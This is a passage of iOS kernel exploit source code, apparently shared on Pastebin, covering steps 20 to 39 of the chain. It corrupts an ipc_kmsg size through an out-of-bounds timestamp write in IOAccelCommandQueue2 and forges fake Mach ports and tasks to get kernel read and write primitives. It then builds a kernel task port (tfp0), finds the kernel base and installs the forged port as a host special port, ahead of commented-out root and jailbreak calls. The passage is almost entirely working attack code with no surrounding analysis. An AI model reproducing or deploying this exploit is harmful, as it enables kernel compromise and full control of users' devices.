  680. if (0x0000000003ffa8ff < ts && ts <= 0x00000003ffa8ffff) {
  681. return 7;
  682. }
  683. // [_______+] [_______+] [0003ffa9, 03ffa900]
  684. if (0x00000003ffa8ffff < ts && ts <= 0x000003ffa8ffffff) {
  685. return 6;
  686. }
  687. // [________]+ [________]+ [0003ffa9, 03ffa900]
  688. if (0x000003ffa8ffffff < ts && ts <= 0x0003ffa8ffffffff) {
  689. return 5;
  690. }
  691. // [________] + [________] + [0003ffa9, 03ffa900]
  692. if (0x0003ffa8ffffffff < ts && ts <= 0x03ffa8ffffffffff) {
  693. return 4;
  694. }
  695. // [00______] + [00______] + [0003ffa9, 00ffffff]
  696. if (0x03ffa8ffffffffff < ts && ts <= 0xfffffffffffeffff) {
  697. return 3;
  698. }
  699. // If the timestamp is too small, then there is no value we can use to increase the
  700. // value of ikm_size. If the timestamp is too large, then we risk it wrapping
  701. // before we can overwrite ikm_size.
  702. assert(ts <= 0x000000000003ffa8 || ts > 0xfffffffffffeffff);
  703. return 0;
  704. };
  705. // We also define a function that checks if an upper bound on the timestamp suggests that
  706. // the overflow_size used was okay.
  707. bool (^check_overflow_size_for_timestamp)(uint64_t, size_t) = ^bool(uint64_t ts, size_t overflow_size) {
  708. assert(3 <= overflow_size && overflow_size <= 8);
  709. // If overflow_size is 3, then drop the lower 5 bytes from the timestamp.
  710. uint32_t ipc_kmsg_size = (uint32_t) (ts >> (8 * (8 - overflow_size)));
  711. assert(0x0003ffa9 <= ipc_kmsg_size); // This should always be true.
  712. return (0x0003ffa9 <= ipc_kmsg_size && ipc_kmsg_size <= 0x0400a8ff);
  713. };
  714.  
  715. // 20. Trigger the OOB write to corrupt the size of the ipc_kmsg directly after the command
  716. // buffer. We bump ikm_size from 0x0001ffa8 to between 0x0003ffa9 and 0x0400a8ff, which
  717. // means that when the ipc_kmsg is freed, at least 16 pages will be deallocated (taking out
  718. // both the original ipc_kmsg allocation and the OOL ports array directly following).
  719. //
  720. // -+------------------+-----------+-----------+-----------------+-----------------+-------
  721. // | command buffer XX ipc_kmsg | ool ports | kfree buf 1 | kfree buf 2 | ...
  722. // -+------------------+-----------+-----------+-----------------+-----------------+-------
  723. // |-ikm_size--------------------------------------->|
  724. size_t overflow_size = 0;
  725. retry_overflow:
  726. overflow_size = compute_overflow_size_for_timestamp(mach_absolute_time());
  727. if (overflow_size == 0) {
  728. sleep(1);
  729. goto retry_overflow;
  730. }
  731. init_out_of_bounds_timestamp_write_size(overflow_size);
  732. IOAccelCommandQueue2_submit_command_buffers(IOAccelCommandQueue2,
  733. &submit_args.header, sizeof(submit_args));
  734. ok = check_overflow_size_for_timestamp(mach_absolute_time(), overflow_size);
  735. if (!ok) {
  736. INFO("Retrying corruption...");
  737. goto retry_overflow;
  738. }
  739. INFO("Corrupted ipc_kmsg ikm_size");
  740.  
  741. // 21. Destroy the port containing the corrupted ipc_kmsg to free the OOL ports array.
  742. //
  743. // [ ipc_kmsg] [ool ports] [ kfree buf 1 ] [ kfree]
  744. // -+------------------v-----------v-----------v-----------------v-------+---------+-------
  745. // | command buffer | | buf 2 | ...
  746. // -+------------------+-------------------------------------------------+---------+-------
  747. // |-ikm_size--------------------------------------->|
  748. mach_port_destroy(mach_task_self(), corrupted_kmsg_port);
  749. INFO("Freed the OOL ports");
  750.  
  751. // 22. Reallocate the out-of-line ports with controlled data. This needs to be done using
  752. // kmem_alloc() to avoid tripping KMA_ATOMIC, since receiving the out-of-line ports will
  753. // cause them to be freed with kfree().
  754. //
  755. // [ ipc_kmsg] [ool ports] [ kfree buf 1 ] [ kfree]
  756. // -+------------------v-----------v-----------v-----------------v-----+-+---------+-------
  757. // | command buffer | fake ool ports | fake ool ports | | buf 2 | ...
  758. // -+------------------+-----------------------+-----------------------+-+---------+-------
  759. // |-ikm_size--------------------------------------->|
  760. uint32_t ool_ports_reallocation_key = IOSurface_property_key(iosurface_property++);
  761. ok = IOSurface_kmem_alloc_array_fast(ool_ports_reallocation_key,
  762. ool_ports_reallocation_array_buffer, // The pre-initialized buffer
  763. ool_ports_reallocation_array_buffer_size); // The size
  764. if (!ok) {
  765. ERROR("Could not reallocate OOL ports");
  766. fail();
  767. }
  768. INFO("Reallocated OOL ports");
  769.  
  770. // 23. Reallocating the OOL ports was our last act of kernel heap manipulation, so go ahead
  771. // and destroy all the holding ports. This won't destroy the ool_ports_msg_holding_port.
  772. holding_ports_destroy(all_holding_ports);
  773.  
  774. // 24. Fault all the pages of the command buffer. If we don't do this, then trying to
  775. // access the command buffer will panic, because the first access is trying to take a lock
  776. // with preemption disabled, which means vm_fault() will bail. Wiring the memory above does
  777. // not ensure that accessing the pages from the kernel won't panic.
  778. void (^init_fake_port)(void *) = ^(void *page) {
  779. uint8_t *page_data = page;
  780. *(uint16_t *) (page_data + 0x16) = 42;
  781. uint8_t *port = page_data + fake_port_offset;
  782. FIELD(port, ipc_port, ip_bits, uint32_t) = io_makebits(1, IOT_PORT, IKOT_NONE);
  783. };
  784. for_each_page(command_buffer, command_buffer_size,
  785. ^(void *page, size_t index, bool *stop) {
  786. // Place a CollectTimeStamp command at the start of the page. It will collect the
  787. // timestamp and then skip to the next page, or to the end of this page if this is
  788. // the last page.
  789. struct IOAccelKernelCommand_CollectTimeStamp *ts_cmd = page;
  790. bool end = (index == (command_buffer_size / page_size) - 1);
  791. ts_cmd->command.type = 2;
  792. ts_cmd->command.size = (uint32_t) page_size - (end ? sizeof(*ts_cmd) : 0);
  793. // Place a fake Mach port on every page.
  794. init_fake_port(page);
  795. });
  796. for_each_page(segment_list, segment_list_size,
  797. ^(void *page, size_t index, bool *stop) {
  798. // Place a fake Mach port on every page but the first (since that would corrupt the
  799. // segment list header).
  800. if (index > 0) {
  801. init_fake_port(page);
  802. }
  803. });
  804. IOAccelCommandQueue2_submit_command_buffers(IOAccelCommandQueue2,
  805. &submit_args.header, sizeof(submit_args));
  806.  
  807. // 25. Receive the out-of-line ports. This gives us a receive right to the fake port inside
  808. // the command buffer (or possibly the segment list).
  809. //
  810. // Receiving the fake out-of-line ports also truncates one of the kmem_alloc() buffers we
  811. // sprayed.
  812. //
  813. // [ ipc_kmsg] [ool ports] [ kfree buf 1 ] [ kfree]
  814. // [e ool ports]
  815. // -+------------------v-----------v-----------v-----------------v-----+-+---------+-------
  816. // | command buffer | fak| | fake ool ports | | buf 2 | ...
  817. // -+------------------+-----------------------+-----------------------+-+---------+-------
  818. // |-ikm_size--------------------------------------->|
  819. __block mach_port_t fake_port = MACH_PORT_NULL;
  820. ool_ports_receive(&ool_ports_msg_holding_port, 1,
  821. ^(mach_port_t *ool_ports, size_t count) {
  822. // We expect the first port to be the fake port. Save it and remove it from the
  823. // array so that it doesn't get destroyed.
  824. fake_port = ool_ports[0];
  825. ool_ports[0] = MACH_PORT_NULL;
  826. });
  827. if (!MACH_PORT_VALID(fake_port)) {
  828. ERROR("Did not receive fake_port");
  829. fail();
  830. }
  831. INFO("Received fake port 0x%x", fake_port);
  832.  
  833. // 26. Give ourselves a send right to the port.
  834. mach_port_insert_send_right(fake_port);
  835.  
  836. // 27. Identify the fake port inside the buffer by looking for a page with a fake port that
  837. // now has an initialized ip_receiver field. The value of this field is the current task's
  838. // ipc_space.
  839. __block uint8_t *fake_port_data = NULL;
  840. __block uint64_t current_ipc_space = 0;
  841. // Check both buffers, just in case.
  842. void *buffer_candidates[2] = { command_buffer, segment_list };
  843. size_t buffer_candidate_sizes[2] = { command_buffer_size, segment_list_size };
  844. const char *buffer_candidate_names[2] = { "command buffer", "segment list" };
  845. for (unsigned i = 0; current_ipc_space == 0 && i < 2; i++) {
  846. void *buffer = buffer_candidates[i];
  847. size_t buffer_size = buffer_candidate_sizes[i];
  848. const char *buffer_name = buffer_candidate_names[i];
  849. // Check each page to see if it contains the port.
  850. for_each_page(buffer, buffer_size, ^(void *page, size_t index, bool *stop) {
  851. uint8_t *port = (uint8_t *) page + fake_port_offset;
  852. uint64_t ip_receiver = FIELD(port, ipc_port, ip_receiver, uint64_t);
  853. if (ip_receiver != 0) {
  854. // Found the port!
  855. fake_port_data = port;
  856. current_ipc_space = ip_receiver;
  857. *stop = true;
  858. INFO("Found fake port in %s at offset 0x%08zx",
  859. buffer_name, port - (uint8_t *) buffer);
  860. }
  861. });
  862. }
  863. if (fake_port_data == NULL) {
  864. ERROR("Could not find fake port in shared memory regions");
  865. fail();
  866. }
  867. INFO("ipc_space: 0x%016llx", current_ipc_space);
  868.  
  869.  
  870. // 28. Construct a kernel memory read primitive using the fake port.
  871. size_t fake_task_address = fake_port_address + page_size;
  872. uint8_t *fake_task_data = fake_port_data + page_size;
  873. uint8_t *fake_task_page = fake_task_data - (fake_task_address & (page_size - 1));
  874. *(uint16_t *) (fake_task_page + 0x16) = 58;
  875.  
  876. INFO("fake_task_address 0x%016llx", fake_port_address);
  877.  
  878. // Read a 32-bit value using pid_for_task().
  879. uint32_t (^stage0_read32)(uint64_t) = ^uint32_t(uint64_t address) {
  880. uint64_t fake_proc_address = address - OFFSET(proc, p_pid);
  881. FIELD(fake_task_data, task, ref_count, uint32_t) = 2;
  882. FIELD(fake_task_data, task, bsd_info, uint64_t) = fake_proc_address;
  883. FIELD(fake_port_data, ipc_port, ip_bits, uint32_t) = io_makebits(1, IOT_PORT, IKOT_TASK);
  884. FIELD(fake_port_data, ipc_port, ip_kobject, uint64_t) = fake_task_address;
  885. int32_t pid = -1;
  886. kern_return_t kr = pid_for_task(fake_port, &pid);
  887. if (kr != KERN_SUCCESS) {
  888. ERROR("Failed to read address 0x%016llx", address);
  889. fail();
  890. }
  891. return pid;
  892. };
  893. // Read a 64-bit value using stage0_read32().
  894. uint64_t (^stage0_read64)(uint64_t) = ^uint64_t(uint64_t address) {
  895. union {
  896. uint32_t value32[2];
  897. uint64_t value64;
  898. } u;
  899. u.value32[0] = stage0_read32(address);
  900. u.value32[1] = stage0_read32(address + 4);
  901. return u.value64;
  902. };
  903.  
  904. // 29. Grab our task port pointer.
  905. uint64_t current_task = stage0_read64(current_ipc_space + OFFSET(ipc_space, is_task));
  906.  
  907. // 30. Walk the proc list until we find the kernproc.
  908. uint64_t current_proc = stage0_read64(current_task + OFFSET(task, bsd_info));
  909. uint64_t kernproc = 0;
  910. for (uint64_t proc = current_proc;;) {
  911. if (proc == 0) {
  912. break;
  913. }
  914. int pid = stage0_read32(proc + OFFSET(proc, p_pid));
  915. if (pid == 0) {
  916. kernproc = proc;
  917. break;
  918. }
  919. proc = stage0_read64(proc + OFFSET(proc, p_list_next));
  920. }
  921.  
  922. // 31. Grab the kernel_task, kernel_map, and ipc_space_kernel.
  923. uint64_t kernel_task = stage0_read64(kernproc + OFFSET(proc, task));
  924. uint64_t kernel_map = stage0_read64(kernel_task + OFFSET(task, map));
  925. uint64_t current_task_port = stage0_read64(current_task + OFFSET(task, itk_sself));
  926. uint64_t ipc_space_kernel = stage0_read64(current_task_port + OFFSET(ipc_port, ip_receiver));
  927.  
  928. // 32. Convert our fake port into a fake kernel_task.
  929. void (^build_fake_kernel_task)(void *) = ^(void *fake_task) {
  930. FIELD(fake_task, task, lck_mtx_data, uint64_t) = 0;
  931. FIELD(fake_task, task, lck_mtx_type, uint8_t) = 0x22;
  932. FIELD(fake_task, task, ref_count, uint32_t) = 4;
  933. FIELD(fake_task, task, active, uint32_t) = 1;
  934. FIELD(fake_task, task, map, uint64_t) = kernel_map;
  935. };
  936. void (^build_fake_kernel_port)(void *, uint64_t) = ^(void *fake_port, uint64_t fake_task_address) {
  937. FIELD(fake_port, ipc_port, ip_bits, uint32_t) = io_makebits(1, IOT_PORT, IKOT_TASK);
  938. FIELD(fake_port, ipc_port, ip_references, uint32_t) = 4;
  939. FIELD(fake_port, ipc_port, ip_receiver, uint64_t) = ipc_space_kernel;
  940. FIELD(fake_port, ipc_port, ip_kobject, uint64_t) = fake_task_address;
  941. FIELD(fake_port, ipc_port, ip_mscount, uint32_t) = 1;
  942. FIELD(fake_port, ipc_port, ip_srights, uint32_t) = 1;
  943. };
  944. build_fake_kernel_task(fake_task_data);
  945. build_fake_kernel_port(fake_port_data, fake_task_address);
  946. // Now we can use our fake_port as a kernel task port.
  947. kernel_task_port = fake_port;
  948.  
  949. // 33. Construct a better kernel task port.
  950. uint64_t fake_kernel_task_page = kernel_vm_allocate(2 * page_size);
  951. if (fake_kernel_task_page == 0) {
  952. ERROR("Could not allocate fake kernel task");
  953. fail();
  954. }
  955. uint64_t fake_kernel_task_port_page = fake_kernel_task_page + page_size;
  956. uint8_t page_buffer[page_size / 4];
  957. // Build the fake kernel_task.
  958. memset(page_buffer, 0, sizeof(page_buffer));
  959. *(uint16_t *) (page_buffer + 0x16) = 58;
  960. uint64_t fake_kernel_task_address = fake_kernel_task_page + 0x100;
  961. uint8_t *fake_kernel_task_data = page_buffer + 0x100;
  962. build_fake_kernel_task(fake_kernel_task_data);
  963. ok = kernel_write(fake_kernel_task_page, page_buffer, sizeof(page_buffer));
  964. if (!ok) {
  965. ERROR("Failed to initialize fake kernel task page");
  966. fail();
  967. }
  968. // Build the fake kernel_task port.
  969. memset(page_buffer, 0, sizeof(page_buffer));
  970. *(uint16_t *) (page_buffer + 0x16) = 42;
  971. uint64_t fake_kernel_task_port_address = fake_kernel_task_port_page + 0x100;
  972. uint8_t *fake_kernel_task_port_data = page_buffer + 0x100;
  973. build_fake_kernel_port(fake_kernel_task_port_data, fake_kernel_task_address);
  974. ok = kernel_write(fake_kernel_task_port_page, page_buffer, sizeof(page_buffer));
  975. if (!ok) {
  976. ERROR("Failed to initialize fake kernel task port page");
  977. fail();
  978. }
  979.  
  980. // 34. Look up our current fake port and replace it with the new fake kernel_task port.
  981. uint64_t (^ipc_entry_lookup)(mach_port_t) = ^uint64_t(mach_port_t port_name) {
  982. uint64_t itk_space = current_ipc_space;
  983. uint32_t table_size = kernel_read32(itk_space + OFFSET(ipc_space, is_table_size));
  984. uint32_t port_index = MACH_PORT_INDEX(port_name);
  985. if (port_index >= table_size) {
  986. return 0;
  987. }
  988. uint64_t is_table = kernel_read64(itk_space + OFFSET(ipc_space, is_table));
  989. uint64_t entry = is_table + port_index * SIZE(ipc_entry);
  990. return entry;
  991. };
  992. uint64_t fake_port_entry = ipc_entry_lookup(fake_port);
  993. // Drop our receive right so that we now only have a send right.
  994. uint32_t ie_bits = kernel_read32(fake_port_entry + OFFSET(ipc_entry, ie_bits));
  995. ie_bits &= ~MACH_PORT_TYPE_RECEIVE;
  996. kernel_write32(fake_port_entry + OFFSET(ipc_entry, ie_bits), ie_bits);
  997. // Change the object to point to the new fake kernel task port. This write has to be
  998. // atomic with respect to the write primitive itself (i.e. it can't be composed of two
  999. // separate 32-bit writes).
  1000. kernel_write64(fake_port_entry + OFFSET(ipc_entry, ie_object),
  1001. fake_kernel_task_port_address);
  1002.  
  1003. // 35. Destroy the holding port for the out-of-line Mach ports message.
  1004. mach_port_destroy(mach_task_self(), ool_ports_msg_holding_port);
  1005.  
  1006. // 36. Patch up the IOSurface properties. We freed some of the kfree() buffer allocations
  1007. // (and possibly split one allocation), and some of the OOL ports reallocation spray OSData
  1008. // buffers probably overlap.
  1009. // Get the address of the IOSurface.
  1010. uint64_t IOSurfaceRootUserClient_ipc_entry = ipc_entry_lookup(IOSurfaceRootUserClient);
  1011. uint64_t IOSurfaceRootUserClient_port =
  1012. kernel_read64(IOSurfaceRootUserClient_ipc_entry + OFFSET(ipc_entry, ie_object));
  1013. uint64_t IOSurfaceRootUserClient_address =
  1014. kernel_read64(IOSurfaceRootUserClient_port + OFFSET(ipc_port, ip_kobject));
  1015. uint64_t surfaceClients = kernel_read64(IOSurfaceRootUserClient_address
  1016. + OFFSET(IOSurfaceRootUserClient, surfaceClients));
  1017. uint64_t surfaceClient = kernel_read64(surfaceClients + IOSurface_id * sizeof(uint64_t));
  1018. uint64_t surface = kernel_read64(surfaceClient + OFFSET(IOSurfaceClient, surface));
  1019. // Get the OSDictionary of IOSurface properties and read out the array of entries.
  1020. uint64_t properties = kernel_read64(surface + OFFSET(IOSurface, properties));
  1021. uint32_t property_count = kernel_read32(properties + OFFSET(OSDictionary, count));
  1022. uint64_t property_array = kernel_read64(properties + OFFSET(OSDictionary, dictionary));
  1023. // We will build an array of OSData buffer addresses that have already been validated and
  1024. // that future OSData objects should not overlap.
  1025. uint64_t *validated_buffers = NULL;
  1026. size_t validated_buffers_count = 0;
  1027. size_t validated_buffers_capacity = 0;
  1028. // Loop through each entry in the OSDictionary, patching up all the problematic OSData
  1029. // objects we sprayed.
  1030. for (uint32_t property_idx = 0; property_idx < property_count; property_idx++) {
  1031. // Get the first 4 bytes of the key.
  1032. uint64_t key_symbol = kernel_read64(property_array
  1033. + (2 * property_idx) * sizeof(uint64_t));
  1034. uint64_t key_data = kernel_read64(key_symbol + OFFSET(OSString, string));
  1035. uint32_t key_value = kernel_read32(key_data);
  1036. // Skip any keys that don't correspond to the properties we need to fix up.
  1037. if (key_value != kfree_buffer_key && key_value != ool_ports_reallocation_key) {
  1038. continue;
  1039. }
  1040. // The value of this property should be an OSArray.
  1041. uint64_t osarray = kernel_read64(property_array
  1042. + (2 * property_idx + 1) * sizeof(uint64_t));
  1043. uint32_t element_count = kernel_read32(osarray + OFFSET(OSArray, count));
  1044. uint64_t elements = kernel_read64(osarray + OFFSET(OSArray, array));
  1045. // Grow the validated_buffers array if necessary.
  1046. if (validated_buffers_count + element_count > validated_buffers_capacity) {
  1047. uint64_t new_capacity = validated_buffers_count + element_count;
  1048. uint64_t *new_validated_buffers = realloc(validated_buffers,
  1049. new_capacity * sizeof(validated_buffers[0]));
  1050. assert(new_validated_buffers != NULL);
  1051. validated_buffers = new_validated_buffers;
  1052. validated_buffers_capacity = new_capacity;
  1053. }
  1054. // Loop through every OSData element in the array.
  1055. for (uint32_t element_idx = 0; element_idx < element_count; element_idx++) {
  1056. // Read out the OSData. The data buffer is valid if (1) it is exactly
  1057. // mapped by a single allocation, and (2) it does not collide with another
  1058. // data buffer. Any OSData that does not abide by these properties will
  1059. // have its size set to zero. This does mean that we will leak the two
  1060. // partial OSData objects (where part of the buffer was freed but the other
  1061. // part is still allocated).
  1062. uint64_t osdata = kernel_read64(elements + element_idx * sizeof(uint64_t));
  1063. uint32_t buffer_size = kernel_read32(osdata + OFFSET(OSData, capacity));
  1064. uint64_t buffer_address = kernel_read64(osdata + OFFSET(OSData, data));
  1065. // If this OSData's buffer has been previously validated, then the
  1066. // allocation is going to be freed by another OSData, so prevent it from
  1067. // being freed again.
  1068. for (size_t i = 0; i < validated_buffers_count; i++) {
  1069. if (buffer_address == validated_buffers[i]) {
  1070. goto disable_free;
  1071. }
  1072. }
  1073. // Get the start address and size of the allocation that contains the first
  1074. // page of the OSData buffer.
  1075. mach_vm_address_t region_address = buffer_address;
  1076. mach_vm_size_t region_size = 0;
  1077. natural_t depth = 0;
  1078. struct vm_region_submap_info_64 info;
  1079. mach_msg_type_number_t count = VM_REGION_SUBMAP_INFO_COUNT_64;
  1080. kr = mach_vm_region_recurse(kernel_task_port,
  1081. &region_address, &region_size, &depth,
  1082. (vm_region_recurse_info_t) &info, &count);
  1083. if (kr != KERN_SUCCESS) {
  1084. WARNING("Could not determine OSData allocation region");
  1085. goto disable_free;
  1086. }
  1087. // If this OSData's buffer does not exactly align with the allocation,
  1088. // prevent it from being freed.
  1089. // TODO: Free this data properly.
  1090. if (region_address != buffer_address || region_size != buffer_size) {
  1091. WARNING("Leaking 0x%016llx-0x%016llx",
  1092. region_address, region_address + region_size);
  1093. goto disable_free;
  1094. }
  1095. // This OSData buffer is valid. Add it to the list.
  1096. assert(validated_buffers_count < validated_buffers_capacity);
  1097. validated_buffers[validated_buffers_count] = buffer_address;
  1098. validated_buffers_count++;
  1099. continue;
  1100. disable_free:
  1101. // Prevent this OSData from freeing its buffer by setting the size to zero.
  1102. kernel_write32(osdata + OFFSET(OSData, capacity), 0);
  1103. }
  1104. }
  1105. // Free the validated buffers array.
  1106. free(validated_buffers);
  1107.  
  1108. // 37. Store the address of some vtable so we can scan for the kernel base. We can no
  1109. // longer scan backwards from realhost because trying to read the PPL pages faults.
  1110. uint64_t kernel_text_address = kernel_read64(IOSurfaceRootUserClient_address);
  1111. kernel_text_address |= 0xffffff8000000000; // Clear PAC
  1112.  
  1113. // 38. Clean up IOSurface.
  1114. INFO("De-inting IOSurface!");
  1115. IOSurface_deinit();
  1116. INFO("Here?");
  1117.  
  1118. kaddr_t kbase, kslide;
  1119.  
  1120. // 39. Get the kernel base address.
  1121. kbase = get_kbase(&kslide, kernel_task_port);
  1122. kbase = kbase + 0xffffffff00000000;
  1123.  
  1124. INFO("kernel base: 0x%016llx", kbase);
  1125. INFO("kernel slide: 0x%016llx", kslide);
  1126.  
  1127.  
  1128.  
  1129. INFO("tfp0: 0x%x", kernel_task_port);
  1130.  
  1131. kernel_write64(fake_kernel_task_address + OFFSET(task, all_image_info_addr), kbase);
  1132. uint64_t host_entry = ipc_entry_lookup(host);
  1133. uint64_t host_port = kernel_read64(host_entry + OFFSET(ipc_entry, ie_object));
  1134. mach_port_deallocate(mach_task_self(), host);
  1135. kernel_write32(host_port + OFFSET(ipc_port, ip_bits), io_makebits(1, IOT_PORT, IKOT_HOST_PRIV));
  1136. uint64_t realhost = kernel_read64(host_port + OFFSET(ipc_port, ip_kobject));
  1137. kernel_write64(realhost + OFFSET(host, special) + 4 * sizeof(uint64_t),
  1138. fake_kernel_task_port_address);
  1139.  
  1140. //init_with_kbase(kernel_task_port, kbase);
  1141. //rootify(getpid());
  1142. //printf("UID = %u", getuid());
  1143. //term_jelbrek();
  1144. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement